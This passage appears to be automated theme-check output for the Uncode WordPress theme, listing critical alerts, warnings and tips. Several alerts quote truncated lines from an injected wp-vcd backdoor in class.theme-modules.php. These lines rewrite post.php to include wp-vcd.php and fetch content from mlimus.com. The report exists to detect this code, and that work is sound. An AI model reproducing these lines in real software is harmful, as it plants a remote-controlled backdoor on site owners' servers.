    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
  6. Malware : Network operations curl_init was found in the file UncodeAPI.class.php
    Line 25: $this->session = curl_init();
    curl_exec was found in the file UncodeAPI.class.php
    Line 91: $resp = curl_exec($this->session);
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File radium-importer.php :
    Line 88: add_submenu_page('uncode-menu', esc_html__('Install Demo','uncode'), esc_ht
    File class-tgm-plugin-activation.php :
    Line 724: $this->page_hook = add_submenu_page( $args['parent_slug'], $args['page_title'], $args['menu_ti
    File communication.php :
    Line 91: add_submenu_page(
    File patches.php :
    Line 98: add_submenu_page(
    File admin.php :
    Line 9: add_menu_page( 'UNCODE', UNCODE_NAME, 'administrator', 'uncode-menu', 'unco
    File admin.php :
    Line 10: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__('System Status','unco
    Line 1120: add_submenu_page( 'tools.php', 'Export', 'Export', 'manage_options', 'uncod
    Line 1755: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__( 'Related Posts', 're
    File admin.php :
    Line 10: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__('System Status','unco
    Line 1120: add_submenu_page( 'tools.php', 'Export', 'Export', 'manage_options', 'uncod
    Line 1755: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__( 'Related Posts', 're
    File admin.php :
    Line 10: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__('System Status','unco
    Line 1120: add_submenu_page( 'tools.php', 'Export', 'Export', 'manage_options', 'uncod
    Line 1755: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__( 'Related Posts', 're
    File media-enhanced.php :
    Line 4: add_submenu_page( 'upload.php', esc_html__('Add oEmbed, external IMG, SVG c
    File font-system.php :
    Line 58: $this->fonts_page_name = add_submenu_page('uncode-menu', 'Fonts', 'Fonts', 'edit_theme_options', 'un
    Line 59: $this->settings_page_name = add_submenu_page('uncode-menu', 'Font Sources', 'Font Sources', 'edit_theme
    File font-system.php :
    Line 58: $this->fonts_page_name = add_submenu_page('uncode-menu', 'Fonts', 'Fonts', 'edit_theme_options', 'un
    Line 59: $this->settings_page_name = add_submenu_page('uncode-menu', 'Font Sources', 'Font Sources', 'edit_theme
    File ot-cleanup-api.php :
    Line 82: $theme_check_bs = 'add_menu_page';
    File ot-settings-api.php :
    Line 101: $theme_check_bs   = 'add_menu_page';
    File ot-settings-api.php :
    Line 102: $theme_check_bs2  = 'add_submenu_page';
  8. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was layersliderwp.zip i-recommend-this.zip revslider.zip uncode-daves-wordpress-live-search.zip vcparticlesbackground.zip uncode-core.zip uncode-js_composer.zip envato-wordpress-toolkit-master.zip vc_clipboard.zip.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments in file footer.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file headers.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file headers.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file elements.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are uncode, woocommerce, radium, wordpress-importer, tgmpa, option-tree, related-posts-for-wp, dot, uncodefont.
  3. Unwanted files : hidden file(s) or folder(s).ds_store was found.
  4. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  5. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  6. I18N implementation : Proper use of ___all(Possible variable $footer_content found in translation function in footer.php. Translation function calls should not contain PHP variables.
    Line 125: if (function_exists('qtranxf_getLanguage')) $footer_content = __($footer_content);
    Possible variable $this found in translation function in headers.php. Translation function calls should not contain PHP variables.
    Line 250: if (function_exists('qtranxf_getLanguage')) $this->html = __($this->html);
    Line 265: if (function_exists('qtranxf_getLanguage')) $this->html = __($this->html);
    Possible variable $this found in translation function in headers.php. Translation function calls should not contain PHP variables.
    Line 250: if (function_exists('qtranxf_getLanguage')) $this->html = __($this->html);
    Line 265: if (function_exists('qtranxf_getLanguage')) $this->html = __($this->html);
    Possible variable $block_text found in translation function in elements.php. Translation function calls should not contain PHP variables.
    Line 957: if (function_exists('qtranxf_getLanguage')) $block_text = __($block_text);
  7. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file media-enhanced.php.
    Line 293: <h2><?php esc_html_e('Add oEmbed, external IMG, SVG code, HTML or Shortcode','uncode'); ?> <a href='upload.php?page=add-other' class='add-new-h2'><?php esc_html_e('Add New','u
    Line 371: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other'; ?>' value='<?php esc_html_e('Save','uncode'); ?
    Line 375: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other&postid='.$_REQUEST['postid'].'&updated=1'; ?>' va
    Possible hard-coded links were found in the file font-system.php.
    Line 383: You will need to create a <a href='http://fontdeck.com'>Fontdeck</a> Project to access your fonts from Fontdec
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 14: require_once( dirname( __FILE__ ) . '/importer/radium-importer.php' ); //lo
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : parsers.php
    Line 62: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 268: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : radium-importer.php
    Line 132: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 483: require_once($class_wp_importer);
    Line 498: require_once($class_wp_import);
    Line 512: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 564: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 667: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : wordpress-importer.php
    Line 167: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : uncode-ajax.php
    Line 11: require_once( $wp_root_path . '/wp-load.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : customizer-woocommerce.php
    Line 237: include_once( get_template_directory() . '/woocommerce/widgets/widget-price
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 91: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Line 354: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : admin.php
    Line 4: require_once 'admin-pages/welcome.php';
    Line 736: require_once ('edit_custom_walker.php');
    Line 985: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 1141: require_once( UNCODE_EXPORT_TEMPLATE );
    Line 1143: require_once( 'export/uncode_export_template.php' );
    Line 1251: require_once(ABSPATH . 'wp-admin/includes/file.php');
    Line 1316: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Data.php
    Line 67: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : font-system.php
    Line 621: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : ot-loader.php
    Line 553: include_once( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

16
Critical alerts
  1. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
    Found ini_set in file class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
  3. Malware : Network operations curl_init was found in the file UncodeAPI.class.php
    Line 25: $this->session = curl_init();
    curl_exec was found in the file UncodeAPI.class.php
    Line 91: $resp = curl_exec($this->session);
  4. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was layersliderwp.zip i-recommend-this.zip revslider.zip uncode-daves-wordpress-live-search.zip vcparticlesbackground.zip uncode-core.zip uncode-js_composer.zip envato-wordpress-toolkit-master.zip vc_clipboard.zip.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments in file footer.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file headers.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file headers.php.Found a translation function that is missing a text-domain. Function __, with the arguments in file elements.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are uncode, woocommerce, radium, wordpress-importer, tgmpa, option-tree, related-posts-for-wp, dot, uncodefont.
  3. Unwanted files : hidden file(s) or folder(s).ds_store was found.
  4. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file media-enhanced.php.
    Line 293: <h2><?php esc_html_e('Add oEmbed, external IMG, SVG code, HTML or Shortcode','uncode'); ?> <a href='upload.php?page=add-other' class='add-new-h2'><?php esc_html_e('Add New','u
    Line 371: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other'; ?>' value='<?php esc_html_e('Save','uncode'); ?
    Line 375: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other&postid='.$_REQUEST['postid'].'&updated=1'; ?>' va
    Possible hard-coded links were found in the file font-system.php.
    Line 383: You will need to create a <a href='http://fontdeck.com'>Fontdeck</a> Project to access your fonts from Fontdec
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 14: require_once( dirname( __FILE__ ) . '/importer/radium-importer.php' ); //lo
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : parsers.php
    Line 62: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 268: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : radium-importer.php
    Line 132: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 483: require_once($class_wp_importer);
    Line 498: require_once($class_wp_import);
    Line 512: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 564: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 667: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : wordpress-importer.php
    Line 167: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : uncode-ajax.php
    Line 11: require_once( $wp_root_path . '/wp-load.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : customizer-woocommerce.php
    Line 237: include_once( get_template_directory() . '/woocommerce/widgets/widget-price
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 91: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Line 354: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : admin.php
    Line 4: require_once 'admin-pages/welcome.php';
    Line 736: require_once ('edit_custom_walker.php');
    Line 985: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Line 1141: require_once( UNCODE_EXPORT_TEMPLATE );
    Line 1143: require_once( 'export/uncode_export_template.php' );
    Line 1251: require_once(ABSPATH . 'wp-admin/includes/file.php');
    Line 1316: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Data.php
    Line 67: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : font-system.php
    Line 621: require_once (ABSPATH . '/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : ot-loader.php
    Line 553: include_once( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes